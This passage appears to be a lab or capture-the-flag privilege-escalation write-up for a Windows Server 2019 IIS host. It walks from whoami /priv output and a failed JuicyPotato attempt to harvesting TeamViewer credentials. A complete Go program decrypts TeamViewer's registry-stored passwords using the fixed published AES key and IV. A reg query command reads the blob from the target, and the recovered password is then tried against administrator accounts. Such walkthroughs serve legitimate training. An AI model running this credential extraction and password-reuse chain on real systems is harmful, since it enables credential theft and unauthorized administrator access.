Enumeration

PS C:\windows\system32\inetsrv>whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

SeImpersonatePrivilege is enabled, so JuicyPotato is the obvious candidate. Let's try escalating privileges with it.

I couldn't make it work. I should have checked systeminfo first: the host is running Windows Server 2019 Standard, and JuicyPotato's DCOM activation trick no longer works on Server 2019 or Windows 10 1809 and later (PrintSpoofer and RoguePotato are the usual alternatives for abusing SeImpersonatePrivilege there).

Running tasklist, I found TeamViewer running. TeamViewer is remote-access software, and it stores its passwords in the registry.

I had to take hints from walkthroughs, and found a reference to a Metasploit post module (post/windows/gather/credentials/teamviewer_passwords) that extracts TeamViewer credentials from a meterpreter session. TeamViewer stores its passwords in the registry encrypted with AES-128-CBC using a fixed key and IV that are publicly known, so anyone who can read those registry values can recover the plaintext. The escalation path then relies on password reuse: if the recovered TeamViewer password is also the Windows password of an administrator, we can log in as that user.
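The decryption described above, as an added example that is not the page's own code nor the Metasploit module: it uses the published TeamViewer key and IV (the CVE-2019-18988 constants) and decodes the UTF-16LE, NUL-padded plaintext the client writes. The registry path in the comments (`HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7`) and the sample password are assumptions; the version subkey name depends on the installed release, and the encrypt routine exists only to construct a realistic input offline, since no real blob is reproduced here.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"encoding/hex"
	"fmt"
	"unicode/utf16"
)

// Fixed AES-128-CBC key and IV that TeamViewer used for the *PasswordAES
// registry values (CVE-2019-18988). They are identical on every install,
// which is the whole weakness: the ciphertext is effectively obfuscation.
var (
	tvKey, _ = hex.DecodeString("0602000000a400005253413100040000")
	tvIV, _  = hex.DecodeString("0100010067244F436E6762F25EA8D704")
)

// decodeUTF16LE converts the little-endian UTF-16 bytes TeamViewer stores into
// a Go string, stopping at the first NUL code unit: the plaintext is NUL-padded
// to the AES block size rather than PKCS#7-padded.
func decodeUTF16LE(b []byte) string {
	units := make([]uint16, 0, len(b)/2)
	for i := 0; i+1 < len(b); i += 2 {
		u := uint16(b[i]) | uint16(b[i+1])<<8
		if u == 0 {
			break
		}
		units = append(units, u)
	}
	return string(utf16.Decode(units))
}

// DecryptTeamViewerPassword takes the raw REG_BINARY value (for example
// SecurityPasswordAES or OptionsPasswordAES) and returns the plaintext.
// Non-block-aligned input is rejected rather than silently truncated.
func DecryptTeamViewerPassword(blob []byte) (string, error) {
	if len(blob) == 0 || len(blob)%aes.BlockSize != 0 {
		return "", fmt.Errorf("ciphertext length %d is not a positive multiple of %d", len(blob), aes.BlockSize)
	}
	block, err := aes.NewCipher(tvKey)
	if err != nil {
		return "", err
	}
	plain := make([]byte, len(blob))
	cipher.NewCBCDecrypter(block, tvIV).CryptBlocks(plain, blob)
	return decodeUTF16LE(plain), nil
}

// EncryptTeamViewerPassword produces a blob in the same layout (UTF-16LE,
// NUL-padded to a block boundary, AES-128-CBC with the fixed key/IV). It is
// here only to construct test input offline; the attack itself never needs it.
func EncryptTeamViewerPassword(password string) []byte {
	raw := make([]byte, 0, 2*len(password)+aes.BlockSize)
	for _, u := range utf16.Encode([]rune(password)) {
		raw = append(raw, byte(u), byte(u>>8))
	}
	pad := aes.BlockSize - len(raw)%aes.BlockSize // always at least one NUL
	raw = append(raw, bytes.Repeat([]byte{0}, pad)...)
	block, _ := aes.NewCipher(tvKey)
	out := make([]byte, len(raw))
	cipher.NewCBCEncrypter(block, tvIV).CryptBlocks(out, raw)
	return out
}

func main() {
	// Constructed sample standing in for a value read from the target's
	// HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7 key (assumed path).
	blob := EncryptTeamViewerPassword("Hunter2!")
	fmt.Printf("SecurityPasswordAES = %X\n", blob)

	pw, err := DecryptTeamViewerPassword(blob)
	if err != nil {
		panic(err)
	}
	fmt.Printf("recovered password  = %q\n", pw)
}
```

On the target, the hex blob comes straight out of the registry (for example `reg query "HKLM\SOFTWARE\WOW6432Node\TeamViewer\Version7"` from the IIS app-pool shell, since the key is world-readable); paste it through `hex.DecodeString` in place of the constructed sample. The recovered string is then tried against local administrator accounts, which is the password-reuse step the page relies on.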
